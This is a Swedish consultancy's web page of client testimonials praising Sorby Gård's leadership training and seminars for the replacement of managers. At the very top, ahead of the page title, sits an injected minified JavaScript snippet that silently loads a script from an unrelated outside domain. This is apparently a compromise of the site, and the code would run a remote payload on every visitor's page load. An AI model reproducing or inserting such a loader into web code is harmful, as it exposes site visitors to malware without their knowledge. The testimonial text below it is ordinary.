;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Referenser | Sorby Gård

Referenser

Plats för text om referenserna.

I samband med chefsbyte för Serviceförvaltningen inom Region Gotland, användes Sorby Gård Organisationskonsult. Dels för att ge den avgående chefen och organisationen ett bra avslut och dels för att bidra till att ge den nye förvaltningschefen och de närmaste medarbetarna en bra start tillsammans.
Metoden som valdes, var att konsulter från Sorby Gård intervjuade var och en i förvaltningens ledningsgrupp inklusive pågående och avgående chef.

Därefter genomfördes ett seminarium, där deltagarna fick intervjuerna presenterade för sig. Både pågående och avgående chef deltog inledningsvis under den första halvdagen. Efter en avslutande middag på kvällen, lämnade avgående chef seminariet. Den nya ledningsgruppen fortsatte ytterligare en halvdag med att klargöra sitt uppdrag, sina mål och sina spelregler för gruppens fortsatta arbete.

Insatsen tillsammans med Sorby Gård Organisationskonsult bidrog till att minimera den ledningssvacka som kan uppstå vid ett chefsbyte. Jag upplever att jag tillsammans med ledningsgruppens övriga medlemmar fick en mycket bra start.

Jag kan rekommendera denna typ av insats och vill framhålla att det öppna klimat som Per Henrik och Britta bidrar till, tillsammans med deras förmåga att läsa in de olika medarbetarnas behov och gruppens klimat starkt bidrar till det lyckade resultatet.

Anders Jolby

Servicedirektör, Region Gotland

Pöyry AB har under många år arbetat tillsammans med Sorby Gård Organisationskonsult avseende bl.a Ledarutveckling, genom kursen Ledarskap & Grupputveckling.

Även i ledningsgruppen och för olika projektteam har vi använt Sorby Gård i syfte att effektivisera samarbete och kommunikation.

Det känns tryggt och stimulerande att arbeta tillsamman med Sorby Gård avseende denna typ av frågor. Vi har oavsett sammanhang alltid upplevt att vi stärkt och utvecklat samarbetet och kommunikationen samt även skapat ett gott klimat både i ledningsgruppen och i våra projektteam.

Jonny Stridh

Business Unit Manager, Pöyry Sweden AB

När någon frågar mig om Sorby Gård, brukar jag svara:
”Om du vill ha ett engagerat team med rak och ärlig kommunikation samt tydliga mål och spelregler, är detta ett företag du kan arbeta tillsammans med.”

Jag har varit deltagare på flera av Sorby Gårds utbildningar, bl.a ledarskapsutbildning (motsvarande UGL), coaching, stresshantering och svåra samtal. Mycket utav det jag lärt mig bär jag med mig i mitt dagliga arbete.

Jag har även skickat min personal på ledarskapsutbildning, teamutveckling mm hos Sorby Gård, vilket gör att vi idag pratar ”samma språk” och har stor förståelse för att vi är olika som människor. Det innebär att vi respekterar varandra på ett bra sätt, vilket också syns i att vi arbetar bättre ihop som team idag.

Jag finner det givande att arbeta ihop med Sorby Gård mycket utifrån deras sätt att jobba upplevelsebaserat, att få delta till 100 % och inte bara sitta still och lyssna. Dessutom kan Britta och Per Henrik på ett bra sätt få varje deltagare att engagera sig och släppa lite på sina skyddsmurar.

När jag deltog i en utbildning kring svåra samtal för chefer, arbetade de även tillsammans med skådespelaren Anders Byström. I denna utbildning fick vi uppleva känslan av att vara chef i situationer som jag tyckte var otroligt jobbiga. Idag är det lättare för mig att ta dessa samtal mycket utifrån vad jag lärt mig om vilka signaler jag skickar ut, ex.vis kring kroppsspråk, energier mm.

Efter de utbildnings-/utvecklingsinsatser som jag och/eller mina medarbetare gjort tillsammans med Sorby Gård, har vi kommit tillbaka fyllda med energi för att klara av det dagliga arbetet på ett effektivare sätt och även kunnat genomföra både större och mindre förändringar.

Christine Wikberg

HR–Direktör, PayEx

Företaget GotlandsHem har använt Sorby Gård i samband med vd byte.
Chefsbytesmötet genomfördes på ett professionellt och bra sätt.

Förberedelserna omfattade intervjuer med samtliga deltagare samt en IDI-test för att klarlägga de olika individernas beteendeprofiler.

Mötet gav mig som nytillträdd vd en snabb ingång i företaget och ledningsgruppen. Det klarlade dels läget i organisationen och de förväntningar som ställs på en ny chef, samt gav ledningsgruppen en möjlighet att ge återkoppling till den avgående chefen. Vi arbetade också igenom en inriktning för ledningsgruppen för det närmaste halvåret.

Sammanfattningsvis kan sägas:
– Konsulterna ledde mötet på ett professionellt och avslappnat sätt.
– Jag fick en bra uppfattning om företaget.
– Jag fick en bra uppfattning om ledningsgruppen som grupp och också enskilda individer.
– Avgående chef fick en bra avslutning på sitt uppdrag. Både att ge egen feedback samt att få feedback från ledningsgruppen.
– Vi sparade mycket tid.
– Vi klarade ut vad som var viktigt att jobba med den närmaste tiden.
– Vi lade en bra grund för det framtida ledningsarbetet.

Jag kan rekommendera Sorby Gård som konsult vid Chefsbytesseminarier.

Staffan Thurgren

VD, AB Gotlandshem

Jag har använt Per Henrik Sorby, Sorby Gård och Mats Karlsson, MKF-Utveckling under 2009 och 2010 i samband med Lean-ledarskap avsnitt i utbildningar förlagda till KTH, Campus Telge.

Målgruppen har varit mellanchefer inom tillverkande industri, AstraZeneca, Scania, Volvo Construction Equipment mfl. Utbildningen har titeln Lean Produktion och innefattar bl.a. detta men även kvalitetsmetoder, motivation och teamorganisation.

Jan Linell, Jatoli AB tillika kollega och undertecknad har hållit i Lean och Kvalitetsbitarna, Per Henrik och Mats i Motivation och Teamorganisation.
Syftet med 7,5 p utbildningen har varit att ge en inblick i olika ledningssystem och produktionsfilosofiers bärande idéer samt hur Lean relateras till andra kvalitetsinitiativ men även att ge en översikt över kvalitetsmetoder för att eliminera slöseri, leverera mesta möjliga kundvärde, förhindra fel i processen etc.
Avsnittet syftar också till att belysa vikten av lagarbete i Lean och hur man skapar framgångsrika förbättringsteam vilket är en av de viktigaste pusselbitarna i Lean.

Ledarskapet är kittet som får transformationen mot en Lean organisation att ta fart och bibehålla inriktningen på arbetet. Per Henrik och Mats har på ett förtjänstfullt sätt skapat förståelse hos kursdeltagarna för ledarskapets betydelse inom Lean.

Per Henrik och Mats arbetar med utgångspunkt i upplevelsebaserad inlärning, vilket innebär att deltagarna engageras i högre utsträckning och att inlärningen ökar. Flera av de verktyg och metoder som förmedlas kan kursdeltagarna sedan ta med sig hem in i sin vardag. Både Mats och Per Henrik visar ett starkt engagemang i allt de företar sig och med sitt jordnära sätt, fyllt med både humor och allvar, är de ett uppskattat inslag i utbildningen. Med många och goda exempel ur företagsvärlden skapar de också en trovärdighet i sin förmedling av kunskap.

Jag kommer fortsatt anlita dem i kurser under 2011, och kan varmt rekommendera båda två för uppdrag såväl inom lednings-/ledarskapsutveckling som teambuilding av grupper.

Anders Hugnell

Teknologie Doktor, KTH Leancentrum